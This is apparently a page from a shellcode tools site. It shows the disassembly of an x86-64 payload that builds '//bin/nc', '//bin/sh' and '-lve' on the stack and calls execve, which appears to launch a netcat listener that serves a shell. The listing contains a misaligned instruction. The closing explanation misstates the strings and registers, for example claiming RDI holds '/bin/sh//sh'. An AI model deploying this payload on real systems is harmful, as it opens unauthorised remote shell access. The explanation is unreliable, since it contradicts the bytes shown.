🚀 copperni.co

shellcode tools

Disassembler Assembler ?? ??

1000: 48 31 ff xor rdi,rdi

1003: 48 f7 e7 mul rdi

1006: 50 push rax

1007: 48 bf 2f 2f 62 69 6e movabs rdi,0x636e2f6e69622f2f

100e: 2f 6e 63

1011: 57 push rdi

1012: 48 89 e7 mov rdi,rsp

1015: 50 push rax

1016: 48 bb 2f 2f 62 69 6e movabs rbx,0x68732f6e69622f2f

101d: 2f 73 68

1020: 53 push rbx

1021: 48 89 e3 mov rbx,rsp

1024: 68 2d 6c 76 65 push 0x65766c2d

1029: 48 89 e1 mov rcx,rsp

102c: 68 2d 70 48 89 push 0xffffffff8948702d

1031: e6 50 out 0x50,al

1033: 53 push rbx

1034: 51 push rcx

1035: 56 push rsi

1036: 57 push rdi

1037: 48 89 e6 mov rsi,rsp

103a: b0 3b mov al,0x3b

103c: 0f 05 syscall

This code creates a string containing "/bin/sh//sh" and stores it in the RDI register. It then stores a string containing "/sh" in the RBX register. It then stores a string containing "-lcvv" in the RCX register and stores a string containing "-pHHx" in the RSI register. Finally, it executes the system call "syscall" with the argument AL set to 3B, which will execute the string contained in RDI.